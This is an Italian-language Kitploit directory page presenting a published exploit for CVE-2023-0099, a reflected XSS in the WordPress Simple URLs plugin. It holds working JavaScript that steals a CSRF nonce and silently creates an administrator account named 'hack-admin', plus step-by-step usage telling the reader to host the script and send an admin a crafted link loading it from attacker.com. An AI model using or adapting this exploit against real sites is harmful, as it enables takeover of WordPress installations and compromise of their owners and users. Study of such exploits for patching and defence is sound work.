Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-0099-exploit — simple urls < 115 - XSS riflesso | Kitploit
Strumenti/GitHubGitHub/amirzargham/cve-2023-0099-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubamirzargham/cve-2023-0099-exploit

CVE-2023-0099-exploit

simple urls < 115 - XSS riflesso

Vedi Repository
612 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-0099-exploit

Titolo Exploit: simple urls < 115 - Reflected XSS

Google Dork:

Autore Exploit: AmirZargham

Homepage del fornitore: https://getlasso.co/

Link del software: https://wordpress.org/plugins/simple-urls/

Versione: < 115

Testato su: firefox,chrome

CVE: CVE-2023-0099

CWE: CWE-79

Piattaforma: MULTIPLE

Tipo: WebApps

Descrizione Il plugin WordPress Simple URLs precedente alla versione 115 non sanitizza e non esegue l'escape di alcuni parametri prima di restituirli in alcune pagine, portando a una Cross-Site Scripting riflessa che potrebbe essere sfruttata contro utenti con privilegi elevati, come gli amministratori.

Exploit:

root@kitploit:~
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}

};
xhr.open("GET", url, true);
xhr.withCredentials = true;
xhr.send();

}

function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&[email protected]&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}

getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);

Info sull'uso:

  1. salva il codice dell'exploit sul server come file javascript.
  2. nel file dell'exploit modifica il valore:
    • user_login: nome utente arbitrario
    • pass1: password arbitraria
    • pass2: password arbitraria
    • email: email arbitraria
  3. ora invia il link malevolo alla vittima: https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=</script><script src="https://attacker.com/exploit.js"></script>
  4. una volta che l'utente Admin è stato creato, vai su /wp-admin o simili e accedi al pannello di WordPress.

Pubblicato su: exploit-db.

Pubblicato su: 0day.today.

Pubblicato su: packet storm.

Scarica lo strumento